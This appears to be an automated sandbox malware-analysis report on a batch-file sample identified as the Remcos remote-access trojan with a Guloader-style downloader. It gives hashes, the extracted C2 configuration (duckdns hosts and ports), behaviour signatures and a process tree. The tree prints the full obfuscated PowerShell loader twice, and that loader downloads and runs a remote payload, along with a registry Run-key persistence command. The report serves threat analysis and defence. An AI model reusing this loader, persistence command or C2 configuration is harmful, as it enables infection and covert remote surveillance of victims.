Analysis

  • max time kernel
    108s
  • max time network
    113s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    10/09/2024, 12:59

General

  • Target

    f752c238ed2ec65819ded5e02c778d38649a74e9dce3e706868cdf5509df8f0d.bat

  • Size

    4KB

  • MD5

    9c8f0258761077d7f288b26b01573037

  • SHA1

    931504788ecaea4dd3f2943b3cf9ac2a21a22f25

  • SHA256

    f752c238ed2ec65819ded5e02c778d38649a74e9dce3e706868cdf5509df8f0d

  • SHA512

    88db0b9a290435d22a55f5c16258cb5eb2c91cf28a2a92ca252ef6b8b654ecea9112c1cad3c1d78b892fb1ee09749e87877a094f024192ac5331390e9d767e81

  • SSDEEP

    96:41jj+2I5lNSvALeDnZaI4pa9YUDjH+Xrn3Qna5:O290IL41cYYUjeXTp

Malware Config

Extracted

Family

remcos

Botnet

Wealthabundance

C2

janbours92harbu03.duckdns.org:3980

janbours92harbu04.duckdns.org:3981

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-5O4NY3

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Time Discovery 1 TTPs 1 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\f752c238ed2ec65819ded5e02c778d38649a74e9dce3e706868cdf5509df8f0d.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2720
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Multiversion='servicekontrakternes';$Avlers=${host}.Runspace;If ($Avlers) {$evyn++;$Multiversion+='Sklmskes';$Accidental='su';$Multiversion+='Snowman';$Accidental+='bs';$Multiversion+='Afhstes';$Accidental+='tri';$Multiversion+='Torturingly16';$Accidental+='ng';};Function Skkevogn($Steamrollers146){$Kautionisten=$Steamrollers146.Length-$evyn;For( $Basunere=2;$Basunere -lt $Kautionisten;$Basunere+=3){$Srlovgivnings+=$Steamrollers146.$Accidental.'Invoke'( $Basunere, $evyn);}$Srlovgivnings;}function chondriomere($Dikaryophasic){ . ($Havestuens) ($Dikaryophasic);}$Slagterhunden=Skkevogn ' .MI,o AzKaiCulSklMia / ,5Hi. F0Ar Br(,oWL,iVanHad.eoLawResAf D N TTu t 1Fr0.e. ,0Pu;M. M.WC.i ,n ,6Xy4Pi;St h.xna6 i4Ca; e SkrImvFy:Ex1Cu2Su1A.. L0 .)M. EnGDoe cKrkStoEf/.r2 e0eb1Ar0Ek0Me1Sp0 .1 W P,FReiCorameP,fDro Kx d/P 1 F2Te1 .F 0 . ';$Mystifying=Skkevogn ' .U DsRueU,rSu- ,A fgNueStnHot,e ';$Bdeniveauer=Skkevogn 'sthSatNot TpSesSk: ./Br/FefN,uSknEtdFaaPacSeiReorhn.eaWirB.r fe .cGuiUdfExeDispr. PovorA gTe/.iiSwm .aH,gMaeRes.l/PiRPra.ud.niPaoVea.ek Rt LiBav,diTytB,eSnt,te.yn CsVa. StSko ocEs> FhK.tTatMip B:Ev/Hr/Cy3 r6Ol.F.5Ev0kl. S1Bl7Ju7E..Ca2.e5 S0 S/BeRHoaInd.liblo TaU,k itCoib vthiMytTaeE tSeeSknDesOn. AtRaoHocFo ';$udbulning=Skkevogn 'T.> u ';$Havestuens=Skkevogn 'Boi .eBexUn ';$Paafuglens='Tsarship';$Fristende = Skkevogn 'K ePec.ehS odi %Poa ,pKopLad va ,tCia.i%K,\ LIS.n ocAgiRetUni,dnSugAn.UdLM,e TdSn Lo&T & U Ble.ucAlhSto , VitIn ';chondriomere (Skkevogn 'H,$DegLglOlonab taB,l S:deTCoo owNonBisE bF,odoy ,=Mi(M,cEpmB dC. S/ vcHe Hv$BoFChrAliEnsQut aeI,nHyd.ne T) , ');chondriomere (Skkevogn 'Na$C,gUnlLoo .bUdaSolP,:bnO emunsPai ydPue ,rZa=G $S,Bemd Me Sn i.ov me ,aE,u BeK.r K.Das p LlIsiUft.o(Mu$Apu.id bTruTrl.gn ,iSrnFogTr)S ');chondriomere (Skkevogn 'Pe[TrN e At.g.UnSVaeTorMivDeiHuc e KPExo .iMdnS t.eMUnaFin aBegSpeVarC.] e: :SpS e Wc Bu.ar Ci It MyAsPPar .o.ntPlob,cOvoPrl,a V =Ud .[ TNR,eArtSp. S jeZ cShuAurEriFltDayKePRer oo otlao ScGnot l ,TcoySap e E]U :Ho:AnTBylAfs 1 G2So ');$Bdeniveauer=$Omsider[0];$Historietimers178= (Skkevogn 'fo$a.g,nlFeo Vb,iaDel S:AdSSuuAgbRelAfe,aaN,sDei.vnKagF.=L,N peAswMe-CiO ebImj ReFicAatSp M S.eyK s.utC.e Am .. TNIneAmtPo.ArWkaeMebfoC SlHei Be ,n,ft');$Historietimers178+=$Townsboy[1];chondriomere ($Historietimers178);chondriomere (Skkevogn '.l$SlSHiuU.bUllIneHeaAlsaaiPrn GgUt. .HNeeDaaSidO.e Mr fsAs[C,$ MfayR.spatA.ijuf.uyF i PnskgD,]A =Sk$t.SFolteaSkg mtBue.rrPeh.ru Kn PdUde FnBa ');$Biotypes=Skkevogn 'ov$FoS,nuAvbAflInePla LsEkiConEngMo.E.DR.o,lwCen.rlSio UaVedG FBuiR,lPoe C(R.$,iBUndM.e,vn,ei Sv eO a AuFoeSkrIn, G$P,S Pm.omExoLam .eIrtT.eBjr.vsV,) H ';$Smmometers=$Townsboy[0];chondriomere (Skkevogn 'D,$Teg l AoItbFea ,l l:TrNS.y ouSad.odimaMenKan.aeSotGa9Br8 y=Be(i T ,eWhsAnt .-AaP gaeltKohbi Gl$T S OmFym oo SmSkeA.tChe ArL,s ,)Ti ');while (!$Nyuddannet98) {chondriomere (Skkevogn 'st$DigStl roOpb IaColSv:WoCReo cnUncYaee nDetHouNeaHulAp= $b.t.trAtuCoeD ') ;chondriomere $Biotypes;chondriomere (Skkevogn 'SeS t PaC r tst-a.SRulF,e,reKrpIm Oc4 o ');chondriomere (Skkevogn '.g$ ,gUnlPro Sb OaEml .:naNo.y Au.rd .dfraSenG nB.eSitIn9Ch8Lo=Mb(IsT UeMisC,tPr-PoPBoa.it UhTr Bo$.eSClm .m UoUnmIne.et Aeo,rD,sAu)F. ') ;chondriomere (Skkevogn 'De$adg.llNooVib a OlI.: eN FoAvn d heSuaTif leBenFii ,n,ag E1Mu8B,5 .= o$ ,gStl.eo.eb .a PlTr:.aMgru IsudeTatexyTrf ,uM.sSt+p +Na%ph$G.OFimF sSiid.d .eKrrS,. .cFooCru DnkotNo ') ;$Bdeniveauer=$Omsider[$Nondeafening185];}$Brownistic=294954;$maxillojugal=28197;chondriomere (Skkevogn ' u$SegRol .o bKaaAslTr: TA,iq UuGraS.tU iRonAltHje AdUa r=Ce BGble kt S- FCBloBon Tt.ne Sn ,tSi Ta$BoSGlm umLioXamGre ItPheFarC s.e ');chondriomere (Skkevogn 'Ba$D,gBll.aoB,bB.aselSy:P USmnTuc,pl,eaRenIld eVisretUli.rnPaeEmlL,y l Wi=In [poSGayBls ,t,iesumB,. vC PoQunCivTre Srnet S]To:D.:,aFperT,o,ym,aBA,a ,s.neTr6He4SpSadtMirHaiPinMegM.(Gi$ElATrq u .aBetE iC,nCotR eKrdUd)Re ');chondriomere (Skkevogn 'Sa$hvg AlMio HbV a ,lSj:KoV seFunPisF.t VrDieOrsB.o Pc siSiaDilm.iKrsUdtFleAerFosCl St=Sk Ke[ oS.ayodsU,tFleSnm.l. VTPreLax,ot.n.ReE tn,kcHio ,dPii,unM,g .]T.: ,: eAVaS ,CUdIT.I.i.OmGSueD.tS SSntPsrBai,nn igSk(Gl$PaU AnR.c KlI aRanPodBle FsSltToiB nnoeN lP.yF ),n ');chondriomere (Skkevogn '.e$WogI lBeoSpbNea,el m:U S DtSueSvm ,m heudp erCoaT,gHot PsR =U $afVCheSpnInst,t ErOveAns .oSkcFoiPha TlBli,dsT.tmieO.rossUn.Bus,au bOcsE,tT,rSoiU n ,gBl(kr$ OB .rInoHiwmen DidrsEct BiEjcOl,Fo$VimRlaG x Di,ulTal BoPrj .u,lg.oaUnl M)Cl ');chondriomere $Stemmepragts;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2956
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Inciting.Led && echo t"
        3⤵
          PID:2916
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Multiversion='servicekontrakternes';$Avlers=${host}.Runspace;If ($Avlers) {$evyn++;$Multiversion+='Sklmskes';$Accidental='su';$Multiversion+='Snowman';$Accidental+='bs';$Multiversion+='Afhstes';$Accidental+='tri';$Multiversion+='Torturingly16';$Accidental+='ng';};Function Skkevogn($Steamrollers146){$Kautionisten=$Steamrollers146.Length-$evyn;For( $Basunere=2;$Basunere -lt $Kautionisten;$Basunere+=3){$Srlovgivnings+=$Steamrollers146.$Accidental.'Invoke'( $Basunere, $evyn);}$Srlovgivnings;}function chondriomere($Dikaryophasic){ . ($Havestuens) ($Dikaryophasic);}$Slagterhunden=Skkevogn ' .MI,o AzKaiCulSklMia / ,5Hi. F0Ar Br(,oWL,iVanHad.eoLawResAf D N TTu t 1Fr0.e. ,0Pu;M. M.WC.i ,n ,6Xy4Pi;St h.xna6 i4Ca; e SkrImvFy:Ex1Cu2Su1A.. L0 .)M. EnGDoe cKrkStoEf/.r2 e0eb1Ar0Ek0Me1Sp0 .1 W P,FReiCorameP,fDro Kx d/P 1 F2Te1 .F 0 . ';$Mystifying=Skkevogn ' .U DsRueU,rSu- ,A fgNueStnHot,e ';$Bdeniveauer=Skkevogn 'sthSatNot TpSesSk: ./Br/FefN,uSknEtdFaaPacSeiReorhn.eaWirB.r fe .cGuiUdfExeDispr. PovorA gTe/.iiSwm .aH,gMaeRes.l/PiRPra.ud.niPaoVea.ek Rt LiBav,diTytB,eSnt,te.yn CsVa. StSko ocEs> FhK.tTatMip B:Ev/Hr/Cy3 r6Ol.F.5Ev0kl. S1Bl7Ju7E..Ca2.e5 S0 S/BeRHoaInd.liblo TaU,k itCoib vthiMytTaeE tSeeSknDesOn. AtRaoHocFo ';$udbulning=Skkevogn 'T.> u ';$Havestuens=Skkevogn 'Boi .eBexUn ';$Paafuglens='Tsarship';$Fristende = Skkevogn 'K ePec.ehS odi %Poa ,pKopLad va ,tCia.i%K,\ LIS.n ocAgiRetUni,dnSugAn.UdLM,e TdSn Lo&T & U Ble.ucAlhSto , VitIn ';chondriomere (Skkevogn 'H,$DegLglOlonab taB,l S:deTCoo owNonBisE bF,odoy ,=Mi(M,cEpmB dC. S/ vcHe Hv$BoFChrAliEnsQut aeI,nHyd.ne T) , ');chondriomere (Skkevogn 'Na$C,gUnlLoo .bUdaSolP,:bnO emunsPai ydPue ,rZa=G $S,Bemd Me Sn i.ov me ,aE,u BeK.r K.Das p LlIsiUft.o(Mu$Apu.id bTruTrl.gn ,iSrnFogTr)S ');chondriomere (Skkevogn 'Pe[TrN e At.g.UnSVaeTorMivDeiHuc e KPExo .iMdnS t.eMUnaFin aBegSpeVarC.] e: :SpS e Wc Bu.ar Ci It MyAsPPar .o.ntPlob,cOvoPrl,a V =Ud .[ TNR,eArtSp. S jeZ cShuAurEriFltDayKePRer oo otlao ScGnot l ,TcoySap e E]U :Ho:AnTBylAfs 1 G2So ');$Bdeniveauer=$Omsider[0];$Historietimers178= (Skkevogn 'fo$a.g,nlFeo Vb,iaDel S:AdSSuuAgbRelAfe,aaN,sDei.vnKagF.=L,N peAswMe-CiO ebImj ReFicAatSp M S.eyK s.utC.e Am .. TNIneAmtPo.ArWkaeMebfoC SlHei Be ,n,ft');$Historietimers178+=$Townsboy[1];chondriomere ($Historietimers178);chondriomere (Skkevogn '.l$SlSHiuU.bUllIneHeaAlsaaiPrn GgUt. .HNeeDaaSidO.e Mr fsAs[C,$ MfayR.spatA.ijuf.uyF i PnskgD,]A =Sk$t.SFolteaSkg mtBue.rrPeh.ru Kn PdUde FnBa ');$Biotypes=Skkevogn 'ov$FoS,nuAvbAflInePla LsEkiConEngMo.E.DR.o,lwCen.rlSio UaVedG FBuiR,lPoe C(R.$,iBUndM.e,vn,ei Sv eO a AuFoeSkrIn, G$P,S Pm.omExoLam .eIrtT.eBjr.vsV,) H ';$Smmometers=$Townsboy[0];chondriomere (Skkevogn 'D,$Teg l AoItbFea ,l l:TrNS.y ouSad.odimaMenKan.aeSotGa9Br8 y=Be(i T ,eWhsAnt .-AaP gaeltKohbi Gl$T S OmFym oo SmSkeA.tChe ArL,s ,)Ti ');while (!$Nyuddannet98) {chondriomere (Skkevogn 'st$DigStl roOpb IaColSv:WoCReo cnUncYaee nDetHouNeaHulAp= $b.t.trAtuCoeD ') ;chondriomere $Biotypes;chondriomere (Skkevogn 'SeS t PaC r tst-a.SRulF,e,reKrpIm Oc4 o ');chondriomere (Skkevogn '.g$ ,gUnlPro Sb OaEml .:naNo.y Au.rd .dfraSenG nB.eSitIn9Ch8Lo=Mb(IsT UeMisC,tPr-PoPBoa.it UhTr Bo$.eSClm .m UoUnmIne.et Aeo,rD,sAu)F. ') ;chondriomere (Skkevogn 'De$adg.llNooVib a OlI.: eN FoAvn d heSuaTif leBenFii ,n,ag E1Mu8B,5 .= o$ ,gStl.eo.eb .a PlTr:.aMgru IsudeTatexyTrf ,uM.sSt+p +Na%ph$G.OFimF sSiid.d .eKrrS,. .cFooCru DnkotNo ') ;$Bdeniveauer=$Omsider[$Nondeafening185];}$Brownistic=294954;$maxillojugal=28197;chondriomere (Skkevogn ' u$SegRol .o bKaaAslTr: TA,iq UuGraS.tU iRonAltHje AdUa r=Ce BGble kt S- FCBloBon Tt.ne Sn ,tSi Ta$BoSGlm umLioXamGre ItPheFarC s.e ');chondriomere (Skkevogn 'Ba$D,gBll.aoB,bB.aselSy:P USmnTuc,pl,eaRenIld eVisretUli.rnPaeEmlL,y l Wi=In [poSGayBls ,t,iesumB,. vC PoQunCivTre Srnet S]To:D.:,aFperT,o,ym,aBA,a ,s.neTr6He4SpSadtMirHaiPinMegM.(Gi$ElATrq u .aBetE iC,nCotR eKrdUd)Re ');chondriomere (Skkevogn 'Sa$hvg AlMio HbV a ,lSj:KoV seFunPisF.t VrDieOrsB.o Pc siSiaDilm.iKrsUdtFleAerFosCl St=Sk Ke[ oS.ayodsU,tFleSnm.l. VTPreLax,ot.n.ReE tn,kcHio ,dPii,unM,g .]T.: ,: eAVaS ,CUdIT.I.i.OmGSueD.tS SSntPsrBai,nn igSk(Gl$PaU AnR.c KlI aRanPodBle FsSltToiB nnoeN lP.yF ),n ');chondriomere (Skkevogn '.e$WogI lBeoSpbNea,el m:U S DtSueSvm ,m heudp erCoaT,gHot PsR =U $afVCheSpnInst,t ErOveAns .oSkcFoiPha TlBli,dsT.tmieO.rossUn.Bus,au bOcsE,tT,rSoiU n ,gBl(kr$ OB .rInoHiwmen DidrsEct BiEjcOl,Fo$VimRlaG x Di,ulTal BoPrj .u,lg.oaUnl M)Cl ');chondriomere $Stemmepragts;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • System Time Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2656
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Inciting.Led && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2680
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2344
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Shawlless" /t REG_EXPAND_SZ /d "%Snyltegsterne% -w 1 $Quells=(Get-ItemProperty -Path 'HKCU:\Panatela\').Hogged;%Snyltegsterne% ($Quells)"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2120
              • C:\Windows\SysWOW64\reg.exe
                REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Shawlless" /t REG_EXPAND_SZ /d "%Snyltegsterne% -w 1 $Quells=(Get-ItemProperty -Path 'HKCU:\Panatela\').Hogged;%Snyltegsterne% ($Quells)"
                6⤵
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Modifies registry key
                PID:1604

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Inciting.Led

      Filesize

      420KB

      MD5

      683ec0fd599284a3b88f5dc0fd0e2dc7

      SHA1

      4d9eb72b652903e6b0d8b28185540929e3d385ca

      SHA256

      81de780cd69365db142df90592938ac3bbe44bc4dca87926b7a38595d02ab0ff

      SHA512

      6830b0ad55e2573678ff6f34cc4f09ef5a82ce00f8f98b0403f5aede3b2ce9dec35d102536486e0124709481226f5988dc8cb6aecfff75d78a45e30b7df25703

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5FEX2FUNXIN7NJWAU4AN.temp

      Filesize

      7KB

      MD5

      ac8b35728ed61242ea9cbfffa033dce0

      SHA1

      1653cbbbb0031f853e1940953dce51976e2dd2f8

      SHA256

      2278775676be7d8935bd5f19f57d82dfb732a464c8805aa8d492efc5e4ee68b5

      SHA512

      9cb100d828dd4db370f59f15d71d540d9762f5ca52cd2e7735d10a62eac048c7ef5fb235f859fe4decf54627e35aa0e575b43a901c4c2c25fe9d86bc2fed6539

    • memory/2344-26-0x0000000000D70000-0x00000000056A0000-memory.dmp

      Filesize

      73.2MB

    • memory/2344-25-0x0000000000400000-0x0000000000581000-memory.dmp

      Filesize

      1.5MB

    • memory/2344-23-0x0000000000400000-0x0000000000581000-memory.dmp

      Filesize

      1.5MB

    • memory/2656-21-0x0000000006340000-0x000000000AC70000-memory.dmp

      Filesize

      73.2MB

    • memory/2956-8-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

      Filesize

      9.6MB

    • memory/2956-11-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

      Filesize

      9.6MB

    • memory/2956-12-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

      Filesize

      9.6MB

    • memory/2956-13-0x000007FEF621E000-0x000007FEF621F000-memory.dmp

      Filesize

      4KB

    • memory/2956-14-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

      Filesize

      9.6MB

    • memory/2956-10-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

      Filesize

      9.6MB

    • memory/2956-9-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

      Filesize

      9.6MB

    • memory/2956-4-0x000007FEF621E000-0x000007FEF621F000-memory.dmp

      Filesize

      4KB

    • memory/2956-7-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

      Filesize

      9.6MB

    • memory/2956-5-0x000000001B220000-0x000000001B502000-memory.dmp

      Filesize

      2.9MB

    • memory/2956-6-0x0000000002360000-0x0000000002368000-memory.dmp

      Filesize

      32KB

    • memory/2956-29-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

      Filesize

      9.6MB